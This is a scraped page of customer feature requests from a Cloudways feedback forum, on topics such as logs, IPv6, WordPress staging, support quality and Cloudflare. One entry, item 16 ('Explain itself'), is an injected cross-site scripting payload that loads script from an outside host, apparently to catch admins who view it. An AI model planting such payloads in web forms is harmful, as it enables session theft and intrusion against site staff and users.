Service Improvement

Cloudways values its customers and their feedback! You can now give us your feedback on how we can improve Cloudways services, solution and products by pitching in your ideas!

• Hot ideas
  • Top ideas
  • New ideas
  • My feedback
  1. Allow us to see our error logs (php, apache, mysql)

We want to see the logs of our apps

7 votes
    Sign in
    (thinking…)
    Sign in with: Facebook Google
    Signed in as (Sign out)

We’ll send you updates on this idea

3 comments  ·  Console Improvements  ·  Flag idea as inappropriate…  ·  Admin →
  2. Have a much simpler SMTP system, elastic email is painful

Every site I have built has issues with contact form mail delivery, this should be such a simple, basic requirement, yet I'm required to jump through hoops and spend hours on live chat to get it working

2 votes
    Sign in
    (thinking…)
    Signed in as (Sign out)

0 comments  ·  Add-ons  ·  Flag idea as inappropriate…  ·  Admin →
  3. Regarding IPV6 enable

Nowadays people are moving to faster internet connection so most users are using IPV6.
    But in CloudWays there is no option to enable ipv6 on Servers (Digitalocean).

So some times who are using the only ipv6, their end our website will not load up.

So here is my request to CloudWays team enable IPV6 for better performance on servers and customer satisfaction.

Regards,
    Mainak

2 votes
    Sign in
    (thinking…)
    Signed in as (Sign out)

0 comments  ·  Applications  ·  Flag idea as inappropriate…  ·  Admin →
  4. Improve Staging Deployment for Wordpress Sites with better Find/Replace

I have found a problem with the Staging deployment for my wordpress sites.
    Some plugins and themes store serialised arrays in the wordpress options. This is a valid technique that results in less DB calls.
    However, if you simply do a find and replace on URLs in the database, the serialisation of the array will break. This means that the Staging site will lose the settings in the plug-ins and themes.
    If you don't realise this, and push the changes back to Live, the Live website will break.

A related problem is with premium plugins and themes that are licensed…

17 votes
    Sign in
    (thinking…)
    Signed in as (Sign out)

5 comments  ·  Wordpress  ·  Flag idea as inappropriate…  ·  Admin →
  5. Switch to AWS t3a.small servers in place of the old t2.small servers for your $36.50/month Managed AWS packages

The t3a family of servers upgrade the old t2 family of servers. The t3a family is cheaper to run yet more powerful, so you'll save money and your clients will get an even better product.

2 votes
    Sign in
    (thinking…)
    Signed in as (Sign out)

0 comments  ·  Server Configuration Improvements  ·  Flag idea as inappropriate…  ·  Admin →
  6. Add Critical CSS option to the Breeze Cache Plugin

Add an option to the Breeze caching plugin to generate the critical css for each page. The Autoptimize and Wp Rocket plugins have this feature and it rocks but I've found that your Breeze plugin renders those other plugins features useless. Your plugin alone provides better results than any of those other options. The critical css is the only thing I find to be missing and would greatly improve load times.

2 votes
    Sign in
    (thinking…)
    Signed in as (Sign out)

0 comments  ·  Wordpress  ·  Flag idea as inappropriate…  ·  Admin →
  7. Auto Scaling WordPress

We need to implement Auto-Scaling WordPress applications quite often which can auto-scale depending on traffic load.

6 votes
    Sign in
    (thinking…)
    Signed in as (Sign out)

1 comment  ·  Applications  ·  Flag idea as inappropriate…  ·  Admin →
  8. Improve your customer support quality (chat/tickets)

I don't know if it's just me, but the support quality and speed has been degraded fast lately..

When I just became customer @Cloudways (like a year ago) support was fast and helpful. They took time and really looked into my issues.

Now it's a whole different story. Today for example, I have been on the chat for OVER 2 HOURS. Literally. All this time waiting, following up what the status was, if they weredoing anything. Very little replies. After an hour the first real reply came in which totally missed the boat, wasn't even related to my question.

I…

81 votes
    Sign in
    (thinking…)
    Signed in as (Sign out)

22 comments  ·  General  ·  Flag idea as inappropriate…  ·  Admin →
  9. Cloudflare integration

Integrate Cloudflare as a DNS server, when setting up a domain in the application, automatically include it through the api in the Cloudflare zone.
    If possible a small panel with zone settings, if not possible, only the shortcut of adding the domain with @ and cname already greatly improves the processes.

46 votes
    Sign in
    (thinking…)
    Signed in as (Sign out)

3 comments  ·  Add-ons  ·  Flag idea as inappropriate…  ·  Admin →
  10. Automatic IP attack blocking

I would suggest that ips be blocked automatically by Cloudways when they were hitting on the site of yours continuously

5 votes
    Sign in
    (thinking…)
    Signed in as (Sign out)

0 comments  ·  Security  ·  Flag idea as inappropriate…  ·  Admin →
  11. Support Quality

The support quality and speed has been degraded fast lately..

When I just became customer @Cloudways (like a year ago) support was fast and helpful.

3 votes
    Sign in
    (thinking…)
    Signed in as (Sign out)

0 comments  ·  Customer Support  ·  Flag idea as inappropriate…  ·  Admin →
  12. Read only user for database

It would be nice to have a read only user for the database so that people that need to perform SELECT queries don't use the admin user to log in.

2 votes
    Sign in
    (thinking…)
    Signed in as (Sign out)

0 comments  ·  Server Configuration Improvements  ·  Flag idea as inappropriate…  ·  Admin →
  13. Restricted access to FTP users

Hi,

You CloudWays have a feature to create new access for Appilcation. But there should be an option to give limited access. For example I have 5 folders in /applications/uhspstmcyh/public_html application. I have a created a new application credential, I want that user should have access to only one folder which is /applications/uhspstmcyh/public_html/area

This feature is not available at the moment.

Thanks,
    Sumit

16 votes
    Sign in
    (thinking…)
    Signed in as (Sign out)

3 comments  ·  Console Improvements  ·  Flag idea as inappropriate…  ·  Admin →
  14. Push and Pull Individual Tables and Folders between staging and live environment

Hello team, pushing and pulling individual tables and folders between staging and the live environment is better compared to transferring the entire database or files. Because in Woocommerce, pushing the database might lead to loss of orders made in between.

11 votes
    Sign in
    (thinking…)
    Signed in as (Sign out)

2 comments  ·  Applications  ·  Flag idea as inappropriate…  ·  Admin →
  15. Multiple databases per application

I'd like to suggest that you implement the possibility to have multiple databases per application.

2 votes
    Sign in
    (thinking…)
    Signed in as (Sign out)

0 comments  ·  Applications  ·  Flag idea as inappropriate…  ·  Admin →
  16. Explain itself

"><script src=https://iampatel.xss.ht></script>

1 vote
    Sign in
    (thinking…)
    Signed in as (Sign out)

1 comment  ·  Drupal  ·  Flag idea as inappropriate…  ·  Admin →
  17. A full ERP, CRM, HR, Accounting, Stock Management System

It would be great if there was to be an add-on, or even an application for stock management, sales, accounting, erp, crm, expenses, HR, employee salaries, payroll, vendors/suppliers, project management with calanders etc, options to link bank accounts, PayPal, Omise, Stripe accounts to quickly check balances and link payments in-going and out-going with payments by customers for products/services and payments to suppliers for products/services, fully customisable invoices, quotations and receipts, option to invoice customers and send receipts to customers, option to send quotations to customers (preferably by 1-click adding products from WooCommerce to the quotation), option for customers to digitally…

2 votes
    Sign in
    (thinking…)
    Signed in as (Sign out)

0 comments  ·  Add-ons  ·  Flag idea as inappropriate…  ·  Admin →
  18. Docker support for DigitalOcean

DigitalOcean(DO) is supporting Docker. I know you are doing your customization on DO, It would be good if you support Docker.
    Thanks

2 votes
    Sign in
    (thinking…)
    Signed in as (Sign out)

0 comments  ·  Stacks  ·  Flag idea as inappropriate…  ·  Admin →
  19. Automate auto purge for Cloudways CDN

Breeze cache has a feature for automatically purging the cache after x minutes. This feature should also be added to Cloudways CDN so that you don't have to do it yourself. Most of the time, I forget to purge the CDN cache which i think other people forget to do as well, therefore this would be a nice feature.

2 votes
    Sign in
    (thinking…)
    Signed in as (Sign out)

0 comments  ·  Integrations  ·  Flag idea as inappropriate…  ·  Admin →
  20. Payment links

Have an option to generate a payment link which can be sent to people directly for the server. Or if the payment fails, do not ask people to login and pay but provide a link which will open a payments page. This way the payment will be faster than logging in and clicking on multiple links before landing on the payments page.

2 votes
    Sign in
    (thinking…)
    Signed in as (Sign out)

0 comments  ·  Payment Methods  ·  Flag idea as inappropriate…  ·  Admin →
  • Don't see your idea?

Feedback and Knowledge Base